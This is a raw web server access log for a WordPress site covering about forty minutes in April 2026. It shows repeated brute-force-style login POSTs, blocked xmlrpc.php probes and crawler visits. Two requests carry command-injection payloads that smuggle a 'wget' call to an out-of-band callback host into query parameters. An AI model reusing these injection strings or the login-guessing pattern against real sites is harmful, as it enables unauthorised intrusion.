159.65.10.179 - - [25/Apr/2026:00:08:39 +0700] "POST //wp-login.php HTTP/1.1" 200 0 "https://sinergihub.id//wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
206.189.152.195 - - [25/Apr/2026:00:08:42 +0700] "POST //wp-login.php HTTP/1.1" 200 0 "https://sinergihub.id//wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
74.7.175.142 - - [25/Apr/2026:00:10:06 +0700] "GET /robots.txt HTTP/2" 200 1 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot"
82.194.91.137 - - [25/Apr/2026:00:10:10 +0700] "POST /xmlrpc.php HTTP/2" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0 Safari/605.1.15"
74.7.227.30 - - [25/Apr/2026:00:10:08 +0700] "GET / HTTP/2" 301 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
159.65.10.179 - - [25/Apr/2026:00:09:41 +0700] "POST //wp-login.php HTTP/1.1" 200 0 "https://sinergihub.id//wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
206.189.152.195 - - [25/Apr/2026:00:09:44 +0700] "POST //wp-login.php HTTP/1.1" 200 0 "https://sinergihub.id//wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
159.65.10.179 - - [25/Apr/2026:00:10:43 +0700] "POST //wp-login.php HTTP/1.1" 200 0 "https://sinergihub.id//wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
206.189.152.195 - - [25/Apr/2026:00:10:46 +0700] "POST //wp-login.php HTTP/1.1" 200 0 "https://sinergihub.id//wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
199.203.54.15 - - [25/Apr/2026:00:12:25 +0700] "GET /wp-login.php HTTP/2" 200 1911 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; Touch; LCJB; rv:11.0) like Gecko"
199.203.54.15 - - [25/Apr/2026:00:12:27 +0700] "POST /wp-login.php HTTP/2" 200 2042 "https://sinergihub.id/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; Touch; LCJB; rv:11.0) like Gecko"
154.196.248.181 - - [25/Apr/2026:00:12:43 +0700] "GET /wp-content/uploads/2025/10/Mask-group-20.png HTTP/1.1" 200 425 "-" "Mozilla/5.0 (compatible; crawler)"
159.65.10.179 - - [25/Apr/2026:00:11:45 +0700] "POST //wp-login.php HTTP/1.1" 200 0 "https://sinergihub.id//wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
206.189.152.195 - - [25/Apr/2026:00:11:48 +0700] "POST //wp-login.php HTTP/1.1" 200 0 "https://sinergihub.id//wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
35.93.79.55 - - [25/Apr/2026:00:12:50 +0700] "GET /robots.txt HTTP/2" 200 26 "-" "Mozilla/5.0 (compatible; wpbot/1.4; +https://forms.gle/ajBaxygz9jSR8p8G9)"
52.70.37.15 - - [25/Apr/2026:00:13:26 +0700] "POST /xmlrpc.php HTTP/2" 403 1242 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; MATMJS; rv:11.0) like Gecko"
159.65.10.179 - - [25/Apr/2026:00:12:47 +0700] "POST //wp-login.php HTTP/1.1" 200 0 "https://sinergihub.id//wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
206.189.152.195 - - [25/Apr/2026:00:12:50 +0700] "POST //wp-login.php HTTP/1.1" 200 0 "https://sinergihub.id//wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
159.65.10.179 - - [25/Apr/2026:00:13:49 +0700] "POST //wp-login.php HTTP/1.1" 200 0 "https://sinergihub.id//wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
206.189.152.195 - - [25/Apr/2026:00:13:52 +0700] "POST //wp-login.php HTTP/1.1" 200 0 "https://sinergihub.id//wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
159.89.172.48 - - [25/Apr/2026:00:15:39 +0700] "GET /wp-login.php HTTP/2" 200 1911 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; MASBJS; rv:11.0) like Gecko"
159.89.172.48 - - [25/Apr/2026:00:15:42 +0700] "POST /wp-login.php HTTP/2" 200 2042 "https://sinergihub.id/wp-login.php" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; MASBJS; rv:11.0) like Gecko"
159.65.10.179 - - [25/Apr/2026:00:14:51 +0700] "POST //wp-login.php HTTP/1.1" 200 0 "https://sinergihub.id//wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
206.189.152.195 - - [25/Apr/2026:00:14:54 +0700] "POST //wp-login.php HTTP/1.1" 200 0 "https://sinergihub.id//wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
103.216.117.118 - - [25/Apr/2026:00:16:45 +0700] "POST /xmlrpc.php HTTP/2" 403 1242 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0"
159.65.10.179 - - [25/Apr/2026:00:15:53 +0700] "POST //wp-login.php HTTP/1.1" 200 0 "https://sinergihub.id//wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
206.189.152.195 - - [25/Apr/2026:00:15:56 +0700] "POST //wp-login.php HTTP/1.1" 200 0 "https://sinergihub.id//wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
159.65.10.179 - - [25/Apr/2026:00:16:55 +0700] "POST //wp-login.php HTTP/1.1" 200 0 "https://sinergihub.id//wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
206.189.152.195 - - [25/Apr/2026:00:16:58 +0700] "POST //wp-login.php HTTP/1.1" 200 0 "https://sinergihub.id//wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
45.92.229.215 - - [25/Apr/2026:00:17:58 +0700] "POST /wp-login.php HTTP/1.1" 200 7107 "-" "Mozilla/5.0"
159.65.10.179 - - [25/Apr/2026:00:17:58 +0700] "POST //wp-login.php HTTP/1.1" 200 0 "https://sinergihub.id//wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
206.189.152.195 - - [25/Apr/2026:00:18:00 +0700] "POST //wp-login.php HTTP/1.1" 200 0 "https://sinergihub.id//wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
188.241.62.83 - - [25/Apr/2026:00:19:03 +0700] "GET /wp-login.php HTTP/2" 200 1911 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; MASAJS; rv:11.0) like Gecko"
188.241.62.83 - - [25/Apr/2026:00:19:06 +0700] "POST /wp-login.php HTTP/2" 200 2042 "https://sinergihub.id/wp-login.php" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; MASAJS; rv:11.0) like Gecko"
159.65.10.179 - - [25/Apr/2026:00:19:00 +0700] "POST //wp-login.php HTTP/1.1" 200 0 "https://sinergihub.id//wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
206.189.152.195 - - [25/Apr/2026:00:19:02 +0700] "POST //wp-login.php HTTP/1.1" 200 0 "https://sinergihub.id//wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
103.143.207.15 - - [25/Apr/2026:00:20:25 +0700] "POST /xmlrpc.php HTTP/2" 403 1242 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36"
159.65.10.179 - - [25/Apr/2026:00:20:02 +0700] "POST //wp-login.php HTTP/1.1" 200 0 "https://sinergihub.id//wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
206.189.152.195 - - [25/Apr/2026:00:20:04 +0700] "POST //wp-login.php HTTP/1.1" 200 0 "https://sinergihub.id//wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
35.93.79.55 - - [25/Apr/2026:00:21:58 +0700] "GET /robots.txt HTTP/2" 401 53 "-" "Mozilla/5.0 (compatible; wpbot/1.4; +https://forms.gle/ajBaxygz9jSR8p8G9)"
35.93.79.55 - - [25/Apr/2026:00:21:58 +0700] "GET /enhancecp HTTP/2" 401 53 "-" "Mozilla/5.0 (compatible; wpbot/1.4; +https://forms.gle/ajBaxygz9jSR8p8G9)"
159.65.10.179 - - [25/Apr/2026:00:21:04 +0700] "POST //wp-login.php HTTP/1.1" 200 0 "https://sinergihub.id//wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
206.189.152.195 - - [25/Apr/2026:00:21:06 +0700] "POST //wp-login.php HTTP/1.1" 200 0 "https://sinergihub.id//wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
91.227.37.60 - - [25/Apr/2026:00:22:46 +0700] "GET /wp-login.php HTTP/2" 200 1911 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36 OPR/52.0.2871.40"
91.227.37.60 - - [25/Apr/2026:00:22:51 +0700] "POST /wp-login.php HTTP/2" 200 2042 "https://sinergihub.id/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36 OPR/52.0.2871.40"
159.65.10.179 - - [25/Apr/2026:00:22:06 +0700] "POST //wp-login.php HTTP/1.1" 200 0 "https://sinergihub.id//wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
206.189.152.195 - - [25/Apr/2026:00:22:08 +0700] "POST //wp-login.php HTTP/1.1" 200 0 "https://sinergihub.id//wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
159.65.10.179 - - [25/Apr/2026:00:23:08 +0700] "POST //wp-login.php HTTP/1.1" 200 0 "https://sinergihub.id//wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
206.189.152.195 - - [25/Apr/2026:00:23:10 +0700] "POST //wp-login.php HTTP/1.1" 200 0 "https://sinergihub.id//wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
45.146.55.251 - - [25/Apr/2026:00:25:07 +0700] "POST /wp-login.php HTTP/1.1" 200 7107 "-" "Mozilla/5.0"
159.65.10.179 - - [25/Apr/2026:00:24:10 +0700] "POST //wp-login.php HTTP/1.1" 200 0 "https://sinergihub.id//wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
206.189.152.195 - - [25/Apr/2026:00:24:12 +0700] "POST //wp-login.php HTTP/1.1" 200 0 "https://sinergihub.id//wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
208.109.188.137 - - [25/Apr/2026:00:25:49 +0700] "GET /wp-login.php HTTP/2" 200 1911 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; WOW64; Trident/7.0)"
208.109.188.137 - - [25/Apr/2026:00:25:54 +0700] "POST /wp-login.php HTTP/2" 200 2042 "https://sinergihub.id/wp-login.php" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.2; WOW64; Trident/7.0)"
159.65.10.179 - - [25/Apr/2026:00:25:12 +0700] "POST //wp-login.php HTTP/1.1" 200 0 "https://sinergihub.id//wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
206.189.152.195 - - [25/Apr/2026:00:25:14 +0700] "POST //wp-login.php HTTP/1.1" 200 0 "https://sinergihub.id//wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
202.92.6.73 - - [25/Apr/2026:00:26:51 +0700] "POST /xmlrpc.php HTTP/2" 403 1242 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; rv:11.0) like Gecko"
206.189.152.195 - - [25/Apr/2026:00:26:16 +0700] "POST //wp-login.php HTTP/1.1" 200 0 "https://sinergihub.id//wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
45.92.229.215 - - [25/Apr/2026:00:27:24 +0700] "POST /wp-login.php HTTP/1.1" 200 7107 "-" "Mozilla/5.0"
206.189.152.195 - - [25/Apr/2026:00:27:18 +0700] "POST //wp-login.php HTTP/1.1" 200 0 "https://sinergihub.id//wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
13.67.116.60 - - [25/Apr/2026:00:28:46 +0700] "GET /backupmgt/localJob.php?session=fail;wget+http://d7jotaiani116mohgtc0qt838yqmi4kjd.oast.live; HTTP/1.1" 404 12487 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
13.67.116.60 - - [25/Apr/2026:00:28:50 +0700] "GET /backupmgt/pre_connect_check.php?auth_name=fail;wget+http://d7jotaiani116mohgtc074pesojukes95.oast.live; HTTP/1.1" 404 12488 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36"
202.61.233.195 - - [25/Apr/2026:00:28:55 +0700] "GET /wp-login.php HTTP/2" 200 1911 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.168 Safari/537.36 OPR/51.0.2830.40"
202.61.233.195 - - [25/Apr/2026:00:28:59 +0700] "POST /wp-login.php HTTP/2" 200 2042 "https://sinergihub.id/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.168 Safari/537.36 OPR/51.0.2830.40"
206.189.152.195 - - [25/Apr/2026:00:28:20 +0700] "POST //wp-login.php HTTP/1.1" 200 0 "https://sinergihub.id//wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
188.241.62.83 - - [25/Apr/2026:00:30:01 +0700] "POST /xmlrpc.php HTTP/2" 403 1242 "-" "Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) like Gecko"
206.189.152.195 - - [25/Apr/2026:00:29:22 +0700] "POST //wp-login.php HTTP/1.1" 200 0 "https://sinergihub.id//wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
206.189.152.195 - - [25/Apr/2026:00:30:24 +0700] "POST //wp-login.php HTTP/1.1" 200 0 "https://sinergihub.id//wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
202.61.233.195 - - [25/Apr/2026:00:32:01 +0700] "GET /wp-login.php HTTP/2" 200 1911 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36 OPR/52.0.2871.64"
202.10.43.50 - - [25/Apr/2026:00:32:05 +0700] "POST /wp-cron.php?doing_wp_cron=1777051925.4677629470825195312500 HTTP/1.1" 200 0 "-" "WordPress/6.9.4; https://sinergihub.id"
202.61.233.195 - - [25/Apr/2026:00:32:07 +0700] "POST /wp-login.php HTTP/2" 200 2042 "https://sinergihub.id/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36 OPR/52.0.2871.64"
206.189.152.195 - - [25/Apr/2026:00:31:26 +0700] "POST //wp-login.php HTTP/1.1" 200 0 "https://sinergihub.id//wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
159.65.10.179 - - [25/Apr/2026:00:32:16 +0700] "POST //wp-login.php HTTP/1.1" 200 0 "https://sinergihub.id//wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
206.189.152.195 - - [25/Apr/2026:00:32:28 +0700] "POST //wp-login.php HTTP/1.1" 200 0 "https://sinergihub.id//wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
159.65.10.179 - - [25/Apr/2026:00:33:18 +0700] "POST //wp-login.php HTTP/1.1" 200 0 "https://sinergihub.id//wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
206.189.152.195 - - [25/Apr/2026:00:33:30 +0700] "POST //wp-login.php HTTP/1.1" 200 0 "https://sinergihub.id//wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
109.228.50.118 - - [25/Apr/2026:00:35:19 +0700] "GET /wp-login.php HTTP/2" 200 1911 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.62 Safari/537.36"
159.65.10.179 - - [25/Apr/2026:00:34:20 +0700] "POST //wp-login.php HTTP/1.1" 200 0 "https://sinergihub.id//wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
109.228.50.118 - - [25/Apr/2026:00:35:22 +0700] "POST /wp-login.php HTTP/2" 200 2042 "https://sinergihub.id/wp-login.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.62 Safari/537.36"
206.189.152.195 - - [25/Apr/2026:00:34:32 +0700] "POST //wp-login.php HTTP/1.1" 200 0 "https://sinergihub.id//wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
207.148.64.111 - - [25/Apr/2026:00:36:20 +0700] "POST /xmlrpc.php HTTP/2" 403 1242 "-" "Mozilla/5.0 (Windows NT 6.1; rv:60.0) Gecko/20100101 Firefox/60.0"
159.65.10.179 - - [25/Apr/2026:00:35:22 +0700] "POST //wp-login.php HTTP/1.1" 200 0 "https://sinergihub.id//wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
206.189.152.195 - - [25/Apr/2026:00:35:34 +0700] "POST //wp-login.php HTTP/1.1" 200 0 "https://sinergihub.id//wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
45.130.83.131 - - [25/Apr/2026:00:36:38 +0700] "POST /wp-login.php HTTP/1.1" 200 7107 "-" "Mozilla/5.0"
159.65.10.179 - - [25/Apr/2026:00:36:24 +0700] "POST //wp-login.php HTTP/1.1" 200 0 "https://sinergihub.id//wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
206.189.152.195 - - [25/Apr/2026:00:36:36 +0700] "POST //wp-login.php HTTP/1.1" 200 0 "https://sinergihub.id//wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
103.56.161.36 - - [25/Apr/2026:00:38:18 +0700] "GET /wp-login.php HTTP/2" 200 1911 "-" "Mozilla/5.0 (Windows NT 5.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
103.56.161.36 - - [25/Apr/2026:00:38:20 +0700] "POST /wp-login.php HTTP/2" 200 2042 "https://sinergihub.id/wp-login.php" "Mozilla/5.0 (Windows NT 5.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
159.65.10.179 - - [25/Apr/2026:00:37:26 +0700] "POST //wp-login.php HTTP/1.1" 200 0 "https://sinergihub.id//wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
206.189.152.195 - - [25/Apr/2026:00:37:38 +0700] "POST //wp-login.php HTTP/1.1" 200 0 "https://sinergihub.id//wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
167.71.226.156 - - [25/Apr/2026:00:39:24 +0700] "POST /xmlrpc.php HTTP/2" 403 1242 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; yie11; rv:11.0) like Gecko"
159.65.10.179 - - [25/Apr/2026:00:38:28 +0700] "POST //wp-login.php HTTP/1.1" 200 0 "https://sinergihub.id//wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
206.189.152.195 - - [25/Apr/2026:00:38:40 +0700] "POST //wp-login.php HTTP/1.1" 200 0 "https://sinergihub.id//wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
159.65.10.179 - - [25/Apr/2026:00:39:30 +0700] "POST //wp-login.php HTTP/1.1" 200 0 "https://sinergihub.id//wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
206.189.152.195 - - [25/Apr/2026:00:39:42 +0700] "POST //wp-login.php HTTP/1.1" 200 0 "https://sinergihub.id//wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
208.109.188.137 - - [25/Apr/2026:00:41:20 +0700] "GET /wp-login.php HTTP/2" 200 1911 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; MALCJS; rv:11.0) like Gecko"
208.109.188.137 - - [25/Apr/2026:00:41:24 +0700] "POST /wp-login.php HTTP/2" 200 2042 "https://sinergihub.id/wp-login.php" "Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; MALCJS; rv:11.0) like Gecko"
159.65.10.179 - - [25/Apr/2026:00:40:32 +0700] "POST //wp-login.php HTTP/1.1" 200 0 "https://sinergihub.id//wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
206.189.152.195 - - [25/Apr/2026:00:40:44 +0700] "POST //wp-login.php HTTP/1.1" 200 0 "https://sinergihub.id//wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
162.215.219.73 - - [25/Apr/2026:00:42:30 +0700] "POST /xmlrpc.php HTTP/2" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36"
159.65.10.179 - - [25/Apr/2026:00:41:34 +0700] "POST //wp-login.php HTTP/1.1" 200 0 "https://sinergihub.id//wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
206.189.152.195 - - [25/Apr/2026:00:41:46 +0700] "POST //wp-login.php HTTP/1.1" 200 0 "https://sinergihub.id//wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
159.65.10.179 - - [25/Apr/2026:00:42:36 +0700] "POST //wp-login.php HTTP/1.1" 200 0 "https://sinergihub.id//wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
206.189.152.195 - - [25/Apr/2026:00:42:48 +0700] "POST //wp-login.php HTTP/1.1" 200 0 "https://sinergihub.id//wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
52.70.37.15 - - [25/Apr/2026:00:44:23 +0700] "GET /wp-login.php HTTP/2" 200 1911 "-" "Mozilla/5.0 (X11; CrOS x86_64 10575.55.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36"
52.70.37.15 - - [25/Apr/2026:00:44:26 +0700] "POST /wp-login.php HTTP/2" 200 2042 "https://sinergihub.id/wp-login.php" "Mozilla/5.0 (X11; CrOS x86_64 10575.55.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36"
159.65.10.179 - - [25/Apr/2026:00:43:38 +0700] "POST //wp-login.php HTTP/1.1" 200 0 "https://sinergihub.id//wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
206.189.152.195 - - [25/Apr/2026:00:43:50 +0700] "POST //wp-login.php HTTP/1.1" 200 0 "https://sinergihub.id//wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36"
116.118.2.113 - - [25/Apr/2026:00:45:34 +0700] "POST /xmlrpc.php HTTP/2" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36"
